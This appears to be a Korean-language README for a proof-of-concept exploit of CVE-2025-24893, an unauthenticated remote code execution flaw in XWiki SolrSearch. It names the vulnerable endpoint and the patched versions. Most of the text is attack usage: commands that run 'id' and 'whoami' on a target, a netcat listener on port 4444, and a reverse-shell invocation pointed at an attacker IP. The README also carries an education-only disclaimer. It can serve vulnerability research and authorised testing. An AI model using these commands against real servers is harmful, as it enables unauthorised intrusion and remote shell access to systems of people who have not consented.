
XWiki SolrSearch (CVE-2025-24893)를 위한 Unauth RCE PoC. 명령 실행 + 리버스 셸.
XWiki SolrSearch에 대한 인증되지 않은 RCE PoC (CVE-2025-24893). 명령 실행 + 리버스 셸.
XWiki SolrSearch 템플릿 인젝션을 통해 인증되지 않은 원격 코드 실행을 유발하는 개념 증명.
XWiki Debian 15.10.8에서 테스트됨 (15.10.11 / 16.4.1 / 16.5.0RC1에서 패치됨).
⚠️ 교육 목적으로만 사용하세요. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 대해 실행하지 마세요.
/xwiki/bin/get/Main/SolrSearch를 통해 전송합니다.pip install requests
스크립트 실행 시 대상 호스트(및 선택적 경로)를 지정하세요.
기본 명령 실행:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
리버스 셸 시작:
# 공격자 박스에서
nc -lvnp 4444
# PoC에서
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...